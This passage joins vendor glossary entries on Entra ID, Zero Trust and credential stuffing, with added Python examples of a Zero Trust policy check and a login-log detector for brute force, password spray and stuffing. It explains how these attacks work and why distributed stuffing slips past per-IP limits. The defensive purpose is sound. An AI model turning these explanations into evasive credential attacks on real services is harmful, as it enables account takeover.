Entra ID Connect synchronizes on-premises directories like Active Directory Domain Services with Entra ID. This allows users to use the same credentials for both on-premises and cloud resources. Entra ID Connect synchronizes objects like:

- User accounts
- Groups
- Contacts

This synchronization process matches on-premises directory objects to their Entra ID counterparts and ensures changes are reflected in both directories.

### Single Sign-On

In single sign-on (SSO), users are able to access multiple applications with a single login. Entra ID provides SSO through the Security Assertion Markup Language (SAML) and OpenID Connect (OIDC) protocols with thousands of pre-integrated applications. With seamless access, users do not have to re-enter their credentials each time they access an app.

### Conditional Access

Entra ID Conditional Access allows administrators to set access controls based on conditions like:

- User location
- Device state
- Risk level
- Application accessed

Admins can block access or require multi-factor authentication to help reduce risk. Conditional Access provides an extra layer of security for accessing resources.

## What is Windows Active Directory?

Windows Active Directory (AD) is Microsoft's directory service for Windows domain networks. It stores information about objects on the network, like users, groups, and computers. AD allows network administrators to manage users and resources in a Windows environment.

AD uses a hierarchical database to store information about objects in the directory. The objects include:

- Users - Represent individual users like employees. Contains info like username, password, and groups they belong to.
- Groups - Collections of users and other groups. Used to assign permissions to multiple users at once.
- Computers - Represent individual machines on the network. Stores info like computer name, IP address, and groups it belongs to.
- Organizational Units (OUs) - Containers used to group users, groups, computers, and other OUs. Help organize objects in the directory and assign permissions.
- Domains - Represent a namespace and security boundary. Made up of OUs, users, groups and computers. The directory service ensures objects with the same domain name share the same security policies.
- Trusts - Allow users in one domain to access resources in another domain. Created between two domains to enable cross-domain authentication.
- Sites - Represent physical locations of subnets on the network. Used to optimize network traffic between objects located in the same site.

AD allows system administrators to have a centralized location to manage users and resources in a Windows environment. By organizing objects like users, groups and computers into a hierarchical structure, AD makes it easy to apply policies and permissions across an entire network.

## Difference Between Windows AD and Entra ID

Windows Active Directory (AD) and Entra ID are both directory services from Microsoft, but they serve different purposes. Windows AD is an on-premises directory service for managing users and resources in an organization. Entra ID is Microsoft's multi-tenant cloud-based directory and identity management service.

Windows AD requires physical domain controllers to store data and manage authentication. Entra ID is hosted in Microsoft's cloud services, so no on-premises servers are needed. Windows AD uses the LDAP protocol, while Entra ID uses RESTful APIs.
Windows AD is designed primarily for on-premises resources, while Entra ID is designed to manage identities and access to cloud applications, software as a service (SaaS) apps, and on-premises apps.

### User management

In Windows AD, users are synced from on-premises Windows servers and managed locally. In Entra ID, users can be created and managed in the cloud portal or synced from on-premises directories using Entra ID Connect. Entra ID also supports bulk user creation and updates through the Entra ID Graph API or PowerShell.

### Application management

Windows AD requires manual configuration to publish on-premises applications. Entra ID offers a gallery of pre-integrated SaaS apps and enables automatic provisioning of users. Custom applications can also be added to Entra ID for single sign-on using SAML or OpenID Connect.

### Authentication Methods

Windows AD uses Kerberos and NTLM for on-premises authentication. Entra ID supports authentication protocols like SAML, OpenID Connect, WS-Federation and OAuth 2.0. Entra ID also provides multi-factor authentication, conditional access policies and identity protection.

### Directory synchronization

Entra ID Connect can synchronize identities from Windows AD to Entra ID. This allows users to sign in to Entra ID and Office 365 using the same username and password. Directory synchronization is one-way, updating Entra ID with changes from Windows AD.

In summary, while Windows AD and Entra ID are both Microsoft directory services, they serve very different purposes. Windows AD is for managing on-premises resources, while Entra ID is a cloud-based service for managing access to SaaS applications and other cloud resources. For many organizations, using Windows AD and Entra ID together provides the most complete solution.

## Entra ID Features

Entra ID provides essential identity and access management capabilities for Azure and Microsoft 365.
It offers core directory services, advanced identity governance, security, and application access management.

### Core directory services

Entra ID acts as a multi-tenant cloud directory and identity management service. It stores information about users, groups, and applications and synchronizes with on-premises directories. Entra ID provides single sign-on (SSO) access to apps and resources. It supports open standards like OAuth 2.0, OpenID Connect, and SAML for SSO integrations.

### Identity governance

Entra ID includes capabilities for managing the identity lifecycle. It provides tools for provisioning and deprovisioning user accounts based on HR data or when employees join, move within, or leave an organization. Conditional access policies can be configured to require multi-factor authentication, device compliance, location restrictions, and more when accessing resources. Entra ID also allows administrators to configure self-service password reset, access reviews, and privileged identity management.

### Security

Entra ID utilizes adaptive machine learning algorithms and heuristics to detect suspicious sign-in activities and potential vulnerabilities. It provides security reports and alerts to help identify and remediate threats. Microsoft also offers Entra ID Premium P2, which includes Identity Protection and Privileged Identity Management for added security.

### Application access management

Entra ID enables single sign-on access to thousands of pre-integrated SaaS apps in the Entra ID app gallery. It supports provisioning users and enabling SSO for custom applications as well. Application proxy provides secure remote access to on-premises web applications. Entra ID B2C offers customer identity and access management for customer-facing applications.

In summary, Entra ID (Azure AD) is Microsoft’s multi-tenant cloud directory and identity management service.
It provides essential capabilities like core directory services, identity governance, security features, and application access management to enable organizations to manage user identities and secure access to resources in Azure, Microsoft 365, and other SaaS applications.

## Benefits of Entra ID

Entra ID provides several benefits for organizations:

### Increased Security

Entra ID provides robust security features like multi-factor authentication, conditional access, and identity protection. MFA adds an extra layer of security for user sign-ins. Conditional access allows organizations to implement access controls based on factors like user location or device state. Identity protection detects potential vulnerabilities and risks to a user’s account.

### Streamlined Access Management

Entra ID simplifies the management of user accounts and access. It provides a single place to manage users and groups, set access policies, and assign licenses or permissions. This helps reduce administrative overhead and ensures consistent policy enforcement across an organization.

### Seamless Single Sign-On

With Entra ID, users can sign in once using their organizational account and access all their cloud and on-premises applications. This single sign-on experience improves productivity and reduces password fatigue for users. Entra ID supports single sign-on for thousands of pre-integrated applications as well as custom applications.

### Increased Productivity

By enabling single sign-on and streamlining access management, Entra ID helps increase end user productivity. Users can quickly access all their applications and resources without having to repeatedly sign in with different credentials. They spend less time managing multiple logins and passwords and more time engaged with the applications and resources they need.

### Cost Savings

For many organizations, Entra ID may help reduce costs associated with on-premises identity solutions.
It eliminates the need to purchase and maintain hardware and software for identity management. And by simplifying access management and enabling single sign-on, it can help reduce help desk costs related to password resets and access issues.

## Common Attacks Against Entra ID

Common attacks against Entra ID include:

### Password spray attacks

Password spray attacks are attempts to access multiple accounts by guessing common credentials. Attackers will try passwords like “Password1” or “1234” hoping they match accounts in the organization. Enabling multi-factor authentication and password policies can help prevent these kinds of brute force attacks.

### Phishing attacks

Phishing attacks try to steal user credentials, install malware, or trick users into granting access to accounts. Attackers will send fraudulent emails or direct users to malicious websites that mimic the look and feel of legitimate Entra ID login pages. Educating users about phishing techniques and enabling multi-factor authentication can help reduce the risk of compromise from phishing.

### Token theft and replay

Access tokens issued by Entra ID can be stolen and replayed to gain access to resources. Attackers will try to trick users or applications into revealing access tokens, then use those tokens to access data and systems. Enabling multi-factor authentication and only issuing short-lived access tokens help prevent token theft and replay attacks.

### Rogue account creation

Attackers will create accounts in Entra ID to use for reconnaissance, as a jumping-off point for lateral movement in the network, or to blend in as a legitimate account. Tightening account creation policies, enabling multi-factor authentication, and monitoring for anomalous account activity can help detect rogue account creation.

### Malware and malicious applications

Malware, malicious applications, and compromised software can be used to extract data from Entra ID, spread to other accounts and systems, or maintain persistence in the network.
Carefully controlling what third-party applications have access to your Entra ID data and accounts, monitoring for signs of compromise, and educating users about safe application usage help reduce the risk from malicious software.

## Conclusion

Entra ID provides essential identity and access management capabilities like multi-factor authentication, conditional access, identity protection, privileged identity management, and more. For any organization looking to improve...

---

- Published: 2023-10-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/zero-trust/

A cybersecurity framework that eliminates any implicit trust within a network by continuously verifying every user and device, enforcing least-privilege access, micro-segmentation, and automated threat response to proactively minimize breaches and lateral movement.

Zero Trust is a cybersecurity framework that eliminates the idea of a trusted network inside a company's perimeter. It takes the approach that no user, device, or service should automatically be trusted. Instead, anything and everything trying to access resources in a network must be verified before access is granted. The core principle of Zero Trust is "never trust, always verify."

## How does Zero Trust differ from traditional security models?

Traditional security models have focused on establishing a hardened network perimeter. Once inside, users and their devices had relatively free access to all systems and resources. Zero Trust, by contrast, eliminates any concept of perimeter and instead “assumes the breach” by verifying every request as if it had originated from outside of a secure network. Zero Trust thus relies on granular, per-request authentication and authorization.

## The Principles of Zero Trust

Zero Trust is a security model that eliminates any implicit trust in a network environment and instead requires the continuous verification of user access and activity. The core principles of Zero Trust are:

- Never trust, always verify. Zero Trust assumes that there may be threat actors already operating inside a network. It continually analyzes every access request, device compliance, user activity, and network events in order to immediately detect and isolate any compromised accounts or systems.
- Verify explicitly. Zero Trust requires explicit identity verification for every device and user, regardless of their location. Authentication and authorization are tightly controlled and constantly monitored.
- Secure access based on the principle of least privilege. Zero Trust limits user access to only what is necessary. Just-in-time and just-enough access are granted based on dynamic policies that have been put in place.
- Inspect and log everything. Zero Trust uses network inspection and monitoring tools to get complete visibility into all network traffic, user and device activity, as well as network events. Logs are continuously analyzed in order to immediately detect threats and prevent unauthorized access.
- Enforce segmentation and micro-perimeters. Zero Trust segments a network into micro-perimeters and enforces security controls between segments. Access between micro-perimeters is granted on a per-session basis.
- Automate security actions. Zero Trust uses security orchestration, automation, and response (SOAR) tools to automatically respond to detected threats, enforce policies, and adapt access rules. This minimizes windows of opportunity for threats to spread.

Zero Trust is a comprehensive cybersecurity framework that addresses the modern threat landscape. By eliminating any implicit trust in a network and strictly controlling user access, Zero Trust helps prevent data breaches, stop ransomware, and reduce the impact of insider threats. For any organization, Zero Trust means proactively reducing risk through a "never trust, always verify" approach to cybersecurity.

## Zero Trust Architecture

A Zero Trust architecture implements these principles through a series of security controls.
Some of the key components include:

- Multi-factor authentication (MFA): Requiring multiple methods to verify a user’s identity, including a combination of passwords, security keys, and biometrics.
- Micro-segmentation: Dividing networks into small zones and requiring authentication to access each zone. This limits any potential damage from a breach.
- Endpoint security: Ensuring all devices on the network meet strict security standards, such as running the latest software patches and deploying sophisticated anti-malware tools. Devices that do not comply are automatically denied access.
- Data encryption: Encrypting all data – both at rest and in transit – to protect it even if other defenses fail.
- Security analytics: Monitoring networks and user activity in real-time to detect any threats as they emerge. Analytics tools can immediately identify anomalies that could indicate a breach or insider threat.
- Orchestration: Coordinating all security tools through a central system in order to simplify management and ensure consistent policy enforcement across the organization.

Zero Trust is a proactive approach that aims to stop breaches before they start by eliminating the implicit trust that is traditionally granted to any user inside a network perimeter. With Zero Trust, security is integrated into every aspect of the network, and access is granted based on the continuous verification of identities and each device’s security posture.

## The Challenges of Implementing Zero Trust

Implementing a Zero Trust security model presents several significant challenges for organizations. Zero Trust radically changes how companies approach cybersecurity, shifting the focus from securing network perimeters to protecting specific resources and data. This new approach requires rethinking many long-held assumptions and security practices.

Transitioning legacy systems and infrastructure to align with Zero Trust principles is a complex undertaking.
Many companies have invested heavily in perimeter-based defenses like firewalls, so replacing or upgrading these systems requires time, money, and expertise. Zero Trust also demands stronger identity and access management (IAM) to control user access. Implementing new identity management solutions and revising access policies can be complicated for large organizations.

Zero Trust requires meticulous asset management and network segmentation in order to limit access and contain breaches. However, accurately identifying and cataloging all assets, especially in expansive corporate networks, is notoriously difficult. Segmenting networks and putting controls in place to limit lateral movement also challenges many traditional architectures and security models. These fundamental changes may necessitate network redesigns and the deployment of new security tools.

Organizational culture and user behaviors can also pose problems. Employees must embrace the idea of Zero Trust and thus adapt to a new way of accessing resources. But long-held habits and assumptions are hard to break, and users may push back against new security processes that impact their productivity or are inconvenient. This is why education and training are essential, even though they require a concerted effort to scale across an entire workforce.

Zero Trust is a complex cybersecurity model that delivers substantial benefits, but it also demands a significant investment of resources in order to implement properly. Transitioning from legacy, perimeter-based defenses to a Zero Trust architecture requires redesigning systems, revising policies, and changing organizational culture. For many companies, these transformational changes can happen gradually through iterative, multi-year initiatives. With time and commitment, Zero Trust can become the new normal.

### The Benefits of Adopting a Zero Trust Framework

The adoption of a Zero Trust framework offers several key benefits to organizations.
#### Improved Security Posture

By eliminating any implicit trust and requiring explicit verification of every device and user, Zero Trust significantly strengthens an organization's security posture. It helps reduce the risk of breaches by minimizing the potential attack surface and enforcing strict access controls. Zero Trust also makes it much more difficult for attackers to move laterally within a network.

#### Better Visibility

A Zero Trust approach provides comprehensive visibility into all users, devices, and network traffic. With granular monitoring and logging, security teams gain real-time insight into access attempts, enabling faster detection of anomalies and potential threats. Analytics and reporting also help identify vulnerabilities and weak spots in security policies.

#### Simplified Security Management

Zero Trust consolidates multiple security controls into a single framework with centralized management and policy configuration. This simplifies administration and helps reduce complexity. Security teams can craft customized access policies based on a user's role, device, location, and other attributes. They can also easily make changes to user access as needed.

#### Improved User Experience

While Zero Trust enhances security, it does not need to negatively impact user experience. With authentication schemes like single sign-on (SSO), users can access corporate resources seamlessly. Conditional access policies can also be put in place so as not to restrict users unnecessarily. These can provide access based on a real-time assessment of risk so that users can remain productive wherever and whenever they need to work.

#### Facilitates Compliance

The strict access controls and auditing capabilities promoted by Zero Trust help organizations achieve and maintain compliance with a host of regulations, including HIPAA, GDPR, and PCI DSS.
A properly implemented Zero Trust framework can provide evidence that sensitive data and critical systems are properly secured, monitored, and segmented. It can also generate audit trails and reports for compliance audits.

In summary, Zero Trust is a robust, integrated framework that strengthens security, provides visibility, simplifies management, improves user experience, and enables compliance. Because of these significant benefits, Zero Trust is gaining mainstream adoption as a strategic approach to enterprise cybersecurity.

### Zero Trust Use Cases

Zero Trust is an approach to cybersecurity that assumes there may be malicious actors already operating inside a network. It therefore requires strict identity verification for every user and device trying to access resources on a private network, regardless of whether they are located within or outside the network perimeter. The Zero Trust model is centered on the belief that organizations should never automatically trust any user. Zero Trust focuses on protecting individual resources rather than entire network segments, and thus provides the least amount of access needed to authorized users. It relies on multiple factors to authenticate user identity before granting access to applications and data.

#### Data Access

Zero Trust is particularly useful for providing secure access to data. It utilizes strong authentication and granular access controls to limit data access to only authorized users and applications. Zero Trust thus restricts lateral movement across a network, containing breaches and preventing unauthorized access to sensitive data. It provides a layered security model that helps protect against both internal and external threats.

#### Cloud Environments

Zero Trust is well suited for securing cloud environments where the traditional network perimeter has dissolved.
It focuses on the identity of users and the sensitivity of data to determine who gets access to what, rather than relying on static network controls. Zero Trust therefore provides a consistent security framework across both on-premises and cloud environments through centralized visibility and control.

#### Remote Workforces

Zero Trust is very effective at securing remote workforces, where many employees access corporate resources from outside the physical office. It provides consistent and granular access controls for all users regardless of their location. Multi-factor authentication (MFA) and device security ensure that only authorized individuals and compliant endpoints can access sensitive applications and data remotely. Zero Trust thus eliminates the need for full-access virtual private networks (VPNs), which often provide much more access than is actually needed.

In summary, Zero Trust is a modern approach to cybersecurity that is well suited for today's digital environments. When implemented properly, it provides secure access and reduces risk across an entire organization. Zero Trust should therefore be a foundational component of any enterprise security strategy.

### Conclusion

With the dissolution of the traditional perimeter, including the rise of hybrid work and bring-your-own-device (BYOD) policies, Zero Trust is becoming a critical philosophy. By explicitly verifying each request as if it had originated from outside a secure network, Zero Trust helps minimize the potential attack surface. Zero Trust also reduces the time to detect and respond to threats through its principles of least-privilege access and microsegmentation. For organizations that want to strengthen their security posture, adopting a Zero Trust model is an essential strategy to reduce risk in today's complex digital world.
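The principles listed in this entry (verify explicitly, least privilege, per-session access between micro-perimeters, continuous risk assessment, log everything) can be made concrete as a small policy decision point. The following is an added illustration, not code from this glossary or from any product; the roles, resources, risk score, thresholds and session format are constructed assumptions.

```python
"""Added example: a minimal Zero Trust policy decision point (PDP).

Every request is verified explicitly (MFA), checked against device compliance,
scoped by least privilege, granted as a short-lived per-resource session, and
logged. Roles, resources, thresholds and the risk score are constructed
assumptions for this example, not a real product's policy model."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Principal:
    user: str
    mfa_verified: bool      # explicit verification performed for this request
    roles: frozenset
    risk_score: int         # 0-100, assumed to come from an analytics pipeline


@dataclass(frozen=True)
class Device:
    device_id: str
    patched: bool
    edr_running: bool

    @property
    def compliant(self) -> bool:
        # Endpoint security check: non-compliant devices are denied outright.
        return self.patched and self.edr_running


@dataclass(frozen=True)
class Request:
    principal: Principal
    device: Device
    resource: str           # the micro-perimeter being accessed
    action: str


@dataclass
class Decision:
    allowed: bool
    reason: str
    session: Optional[str] = None
    expires_at: Optional[int] = None


# Least privilege: each role lists exactly the (resource, action) pairs it needs.
ROLE_ENTITLEMENTS: Dict[str, Set[Tuple[str, str]]] = {
    "finance": {("ledger-db", "read")},
    "dba": {("ledger-db", "read"), ("ledger-db", "write")},
    "hr": {("hr-portal", "read"), ("hr-portal", "write")},
}
RISK_STEP_UP = 60        # above this score the request must re-authenticate
SESSION_TTL = 15 * 60    # just-in-time grants expire after 15 minutes


class PolicyDecisionPoint:
    def __init__(self) -> None:
        self.audit_log: List[dict] = []       # "inspect and log everything"
        self.sessions: Dict[str, dict] = {}   # per-session, per-resource grants

    def evaluate(self, req: Request, now: int) -> Decision:
        decision = self._decide(req, now)
        self.audit_log.append({
            "ts": now, "user": req.principal.user, "device": req.device.device_id,
            "resource": req.resource, "action": req.action,
            "allowed": decision.allowed, "reason": decision.reason,
        })
        return decision

    def _decide(self, req: Request, now: int) -> Decision:
        p = req.principal
        if not p.mfa_verified:                        # verify explicitly
            return Decision(False, "verify_explicitly: mfa_required")
        if not req.device.compliant:                  # device posture
            return Decision(False, "device_noncompliant")
        entitled: Set[Tuple[str, str]] = set()
        for role in p.roles:                          # least privilege
            entitled |= ROLE_ENTITLEMENTS.get(role, set())
        if (req.resource, req.action) not in entitled:
            return Decision(False, "least_privilege: not_entitled")
        if p.risk_score > RISK_STEP_UP:               # continuous risk assessment
            return Decision(False, "step_up_required")
        # Just-in-time, just-enough: one session, one resource, one action, with expiry.
        token = f"{p.user}:{req.device.device_id}:{req.resource}:{req.action}:{now}"
        expires = now + SESSION_TTL
        self.sessions[token] = {"resource": req.resource, "action": req.action,
                                "expires_at": expires}
        return Decision(True, "granted", token, expires)

    def session_allows(self, token: str, resource: str, action: str, now: int) -> bool:
        """Per-session enforcement between micro-perimeters: a grant for one
        resource/action never opens another, and it lapses at expiry."""
        s = self.sessions.get(token)
        return (s is not None and s["resource"] == resource
                and s["action"] == action and now < s["expires_at"])


if __name__ == "__main__":
    pdp = PolicyDecisionPoint()
    alice = Principal("alice", True, frozenset({"finance"}), risk_score=10)
    laptop = Device("lap-1", patched=True, edr_running=True)
    d = pdp.evaluate(Request(alice, laptop, "ledger-db", "read"), now=1000)
    print(d.reason, pdp.session_allows(d.session, "hr-portal", "read", 1200))
```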
---

- Published: 2023-02-23
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/credential-stuffing/

A cyberattack technique where automated tools test stolen or leaked credentials across multiple services to gain unauthorized access due to reused login details.

Credential stuffing is a type of cyber attack that involves using compromised credentials to gain unauthorized access to user accounts. This technique relies on the fact that many people use the same username and password combinations across multiple websites and services, making it easy for attackers to test these credentials against different platforms until they find a match. Once they have gained access to an account, attackers can steal sensitive information, commit fraud, or carry out other malicious activities.

While credential stuffing attacks are not new, they have become increasingly common in recent years due to the widespread availability of compromised credentials on the dark web. These credentials are often obtained through data breaches or phishing scams and can be purchased by anyone with a few dollars to spare. As a result, even companies with strong security measures in place can fall victim to credential stuffing if their users' login details have been compromised elsewhere.

### How Credential Stuffing Works: Techniques and Methods

Credential stuffing is a type of cyber attack that relies on the use of automated tools to test large numbers of stolen login credentials (username and password pairs) against various websites and applications. The goal is to gain unauthorized access to user accounts, which can then be used for fraudulent activities such as identity theft, financial fraud, or spamming. To achieve this, attackers typically use a combination of techniques and methods that exploit vulnerabilities in the authentication process.

One common technique used in credential stuffing attacks is called "list-based" or "dictionary-based" attacks.
This involves using pre-existing lists of usernames and passwords that have been obtained from previous data breaches or other sources. These lists are then fed into an automated tool that tries each combination until it finds one that works. Another technique is known as "credential cracking," which involves using brute-force methods to guess passwords by trying every possible combination until the correct one is found.

In addition to these techniques, attackers may also use more sophisticated methods such as "credential spraying," which involves targeting a large number of users with a small number of commonly used passwords (such as "password123") in order to increase their chances of success. They may also use social engineering tactics such as phishing emails or fake login pages to trick users into revealing their credentials directly.

### What is the difference between Credential Stuffing and Brute Force Attacks?

Credential stuffing and brute force attacks are both techniques used by hackers to gain unauthorized access to user accounts. While they share the common goal of obtaining login credentials, they differ in their approaches and methodologies. Credential stuffing relies on reused credentials from data breaches and automated scripts to gain unauthorized access, while brute force attacks involve systematically trying all possible combinations of usernames and passwords.
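The three patterns just described (list-based stuffing, brute-force cracking, and spraying) leave different footprints in authentication logs, and a defender who only counts failures per source IP will miss the distributed, one-attempt-per-account shape of credential stuffing. The following detection sketch is an added example, not code from this glossary or from any product; the sample events, thresholds and field names are constructed assumptions.

```python
"""Added example: telling brute force, password spray and credential stuffing
apart in authentication logs.

Per-IP failure counters catch brute force and (often) spraying, but credential
stuffing spreads one attempt per account across many IPs, so the window-level
aggregates below look at user and IP diversity instead. Events, thresholds and
field names are constructed assumptions for this example."""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Illustrative thresholds; tune them against a baseline of your own logs.
MIN_EVENTS = 20            # below this volume a window is never labelled an attack
MIN_FAIL_RATE = 0.3        # ordinary traffic fails far less often than any attack
SINGLE_USER_SHARE = 0.5    # brute force: one account absorbs most attempts
DISTINCT_USER_SHARE = 0.8  # spray / stuffing: almost every attempt is a new account
DISTINCT_IP_SHARE = 0.5    # stuffing: attempts are spread across many source IPs


@dataclass(frozen=True)
class LoginEvent:
    ts: int          # seconds
    ip: str
    user: str
    success: bool


def window_metrics(events: List[LoginEvent]) -> Dict[str, float]:
    n = len(events)
    if n == 0:
        return {"attempts": 0, "fail_rate": 0.0, "distinct_user_share": 0.0,
                "distinct_ip_share": 0.0, "top_user_share": 0.0}
    users = Counter(e.user for e in events)
    ips = Counter(e.ip for e in events)
    failures = sum(1 for e in events if not e.success)
    return {
        "attempts": n,
        "fail_rate": failures / n,
        "distinct_user_share": len(users) / n,   # ~1.0 when every attempt is a new user
        "distinct_ip_share": len(ips) / n,       # ~1.0 when every attempt is a new IP
        "top_user_share": max(users.values()) / n,
    }


def classify_window(events: List[LoginEvent]) -> Tuple[str, Dict[str, float]]:
    m = window_metrics(events)
    if m["attempts"] < MIN_EVENTS or m["fail_rate"] < MIN_FAIL_RATE:
        return "normal", m
    if m["top_user_share"] >= SINGLE_USER_SHARE:
        return "brute_force", m              # one account, many guesses
    if m["distinct_user_share"] >= DISTINCT_USER_SHARE:
        if m["distinct_ip_share"] >= DISTINCT_IP_SHARE:
            return "credential_stuffing", m  # many accounts, many IPs, once each
        return "password_spray", m           # many accounts, few IPs
    return "normal", m


def classify_log(events: List[LoginEvent], window_seconds: int = 300) -> Dict[int, str]:
    """Bucket events into fixed windows and label each one."""
    buckets: Dict[int, List[LoginEvent]] = {}
    for e in events:
        buckets.setdefault(e.ts // window_seconds * window_seconds, []).append(e)
    return {start: classify_window(evts)[0] for start, evts in buckets.items()}


def flagged_by_per_ip_limit(events: List[LoginEvent], limit: int = 10) -> List[str]:
    """What a naive per-IP control sees: IPs with more than `limit` failures."""
    fails = Counter(e.ip for e in events if not e.success)
    return sorted(ip for ip, c in fails.items() if c > limit)


def sample_events() -> List[LoginEvent]:
    """Constructed traffic, one pattern per 5-minute window (not real logs)."""
    ev: List[LoginEvent] = []
    for i in range(30):   # 0s: ordinary logins, 25 users, 3 failures
        ev.append(LoginEvent(10 + i, f"192.0.2.{i % 25}", f"user{i % 25}", i % 10 != 0))
    for i in range(50):   # 300s: brute force, one account, one IP
        ev.append(LoginEvent(300 + i, "203.0.113.7", "alice", False))
    for i in range(60):   # 600s: password spray, 60 accounts from two IPs
        ev.append(LoginEvent(600 + i, f"198.51.100.{i % 2}", f"user{i}", False))
    for i in range(60):   # 900s: stuffing, 60 accounts from 60 IPs, a quarter reused
        ev.append(LoginEvent(900 + i, f"10.0.{i}.1", f"user{i}", i % 4 == 0))
    return ev


if __name__ == "__main__":
    events = sample_events()
    for start, label in sorted(classify_log(events).items()):
        window = [e for e in events if start <= e.ts < start + 300]
        print(start, label, "per-IP limit flags:", flagged_by_per_ip_limit(window))
```

In the stuffing window every IP contributes a single failure, so the per-IP limit flags nothing, while the window-level aggregates still label it; that gap is the detection challenge this entry goes on to describe.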
Here's a breakdown of the main differences between credential stuffing and brute force attacks:

| | Credential Stuffing | Brute Force Attacks |
|---|---|---|
| Methodology | Automated testing of username/password combinations against multiple websites or services | Exhaustive trial-and-error approach, checking all possible combinations of usernames and passwords |
| Exploiting Password Reuse | Relies on users reusing the same credentials across multiple accounts | Does not rely on stolen credentials, but rather attempts to guess the password through computational power |
| Automation | Highly automated, using scripts or bots to test large numbers of credentials simultaneously | Requires computational power to systematically check all possible combinations |
| Speed | Can be executed quickly, as it tries known credentials rather than attempting to guess or crack passwords | Can be time-consuming, especially for complex and lengthy passwords or strong encryption |
| Risk Mitigation | Websites can implement rate limiting, multi-factor authentication, and monitoring for suspicious login activity | Websites may implement account lockouts, CAPTCHA challenges, or time delays between login attempts |

### Common Targets of Credential Stuffing Attacks: Industries and Websites

Credential stuffing attacks are a growing concern for businesses across various industries. Cybercriminals target websites that store sensitive information, such as login credentials, to gain unauthorized access to user accounts. Some of the most common targets of credential stuffing attacks include financial institutions, e-commerce platforms, and social media networks.

Financial institutions are particularly vulnerable to credential stuffing attacks due to the nature of their business. Hackers can use stolen login credentials to access bank accounts and steal money or personal information. E-commerce platforms are also popular targets because they store payment information and other sensitive data.
Social media networks are targeted because they contain a wealth of personal information that can be used for identity theft or other malicious purposes. In addition to these industries, any website that requires users to create an account is at risk of a credential stuffing attack. This includes online gaming platforms, streaming services, and even healthcare providers. As more businesses move online and store sensitive data in digital form, the threat of credential stuffing attacks will continue to grow.

### Consequences of Credential Stuffing: Data Breaches and Identity Theft

Credential stuffing attacks can have severe consequences for both individuals and organizations. One of the most significant outcomes of these attacks is data breaches, which can result in the exposure of sensitive information such as personal details, financial data, and login credentials. Once this information falls into the wrong hands, cybercriminals can use it to carry out further attacks or sell it on the dark web.

Another consequence of credential stuffing is identity theft. Cybercriminals can use stolen login credentials to gain access to a victim's accounts and steal their identity. This can lead to financial losses, damage to credit scores, and even legal issues if the attacker uses the victim's identity for illegal activities.

The impact of credential stuffing attacks goes beyond just financial losses and reputational damage for businesses. It also affects individuals who fall victim to these attacks. Therefore, it is crucial that individuals take steps to protect themselves by using strong passwords and enabling two-factor authentication wherever possible.

### What are the challenges in detection and prevention of credential stuffing?

- Legitimate credentials: Credential stuffing attacks involve the use of stolen usernames and passwords, which are legitimate credentials on their own.
Since attackers are not generating random combinations, it becomes harder to differentiate between legitimate login attempts and malicious ones.
- Distributed attacks: Attackers often distribute their login attempts across multiple IP addresses and employ techniques like botnets or proxy servers. This distribution helps them evade detection by security systems that typically monitor login attempts from a single IP address.
- Traffic patterns: Credential stuffing attacks aim to mimic legitimate user behavior and traffic patterns, making it difficult to distinguish between genuine login attempts and malicious ones. Attackers may gradually increase their login frequency to avoid triggering account lockouts or generating suspicious traffic patterns.
- Evolving attack methods: Attackers constantly adapt their techniques to bypass detection mechanisms. They may employ sophisticated bot software that mimics human behavior, utilize headless browsers to bypass security controls, or leverage CAPTCHA-solving services to automate the authentication process.
- Use of botnets: Attackers often use botnets, which are networks of compromised computers, to distribute and coordinate credential stuffing attacks. The use of botnets makes it challenging to identify and block the malicious traffic, as it may appear to originate from various sources.
- Stolen credentials availability: The availability of vast quantities of stolen usernames and passwords on the dark web and other illicit platforms makes it easier for attackers to conduct credential stuffing attacks. This abundance of compromised credentials increases the number of potential targets and makes detection more difficult.

### What makes credential stuffing harder to protect against than brute force attacks?

Credential stuffing attacks and brute force attacks are both methods used to gain unauthorized access to user accounts, but they differ in terms of their approach and detection challenges.
Here's an overview of the differences:

Approach:

- Brute force attacks: In a brute force attack, an attacker systematically tries every possible combination of usernames and passwords until they find the correct one. This method requires the attacker to generate and test a large number of combinations, which can be time-consuming.
- Credential stuffing attacks: In credential stuffing, attackers use pre-existing lists of stolen usernames and passwords obtained from previous data breaches or leaks. They automate the process of injecting these credentials into various websites or services to find accounts where users have reused their login information.

Detection challenges:

- Brute force attacks: Brute force attacks are often easier to detect because they involve a high volume of login attempts within a short period. Security systems can monitor and flag such suspicious behavior based on factors like the frequency and rate of login attempts from a single IP address.
- Credential stuffing attacks: Detecting credential stuffing attacks can be more challenging for several reasons:
  - Legitimate credentials: Attackers use valid combinations of usernames and passwords, which are not inherently suspicious on their own.
  - Distributed attempts: Instead of a single IP address attempting multiple logins, credential stuffing attacks are often distributed across multiple IP addresses, making it harder to identify them based on login patterns alone.
  - Login failures: Attackers typically avoid triggering account lockouts or generating an excessive number of failed login attempts, reducing the chances of being flagged by traditional security systems.
  - Traffic patterns: Credential stuffing attacks can mimic legitimate user behavior and generate traffic patterns similar to normal login activity, making it difficult to distinguish between genuine and malicious login attempts.

### What makes credential stuffing harder to protect against than password spray attacks?
Credential stuffing and password spray attacks are both methods used to compromise user accounts, but they differ in their approach and the challenges they pose for detection and prevention. Here's why credential stuffing can be harder to detect and prevent compared to password spray attacks:

Approach:

- Credential stuffing: Attackers leverage lists of stolen usernames and passwords obtained from previous data breaches or leaks. They automate the process of injecting these credentials into various websites or services to find accounts where users have reused their login information.
- Password spray: Attackers use a small set of commonly used or easily guessable passwords (e.g., "123456" or "password") and attempt to log in to multiple user accounts by spraying these passwords across various usernames.

Detection and prevention challenges:

- Username diversity: In credential stuffing attacks, attackers use legitimate usernames along with stolen passwords. Since the usernames are not random or easily guessable, it becomes challenging to detect the malicious activity based solely on the usernames being targeted.
- Low failure rate: Credential stuffing attacks aim to avoid triggering account lockouts or generating excessive failed login attempts. Attackers may keep failure rates low by only attempting to log in with credentials they believe to be valid, which makes it harder to identify and block the attack based on failed login attempts.
- Distributed nature: Credential stuffing attacks are often distributed across multiple IP addresses or botnets, making it difficult to identify the coordinated attack pattern compared to password spray attacks, which typically involve a single or limited number of IP addresses.
- Mimicking legitimate traffic: Credential stuffing attacks aim to mimic legitimate user behavior and traffic patterns. Attackers carefully space out their login attempts, simulate human-like activity, and avoid suspicious patterns that may trigger detection mechanisms.
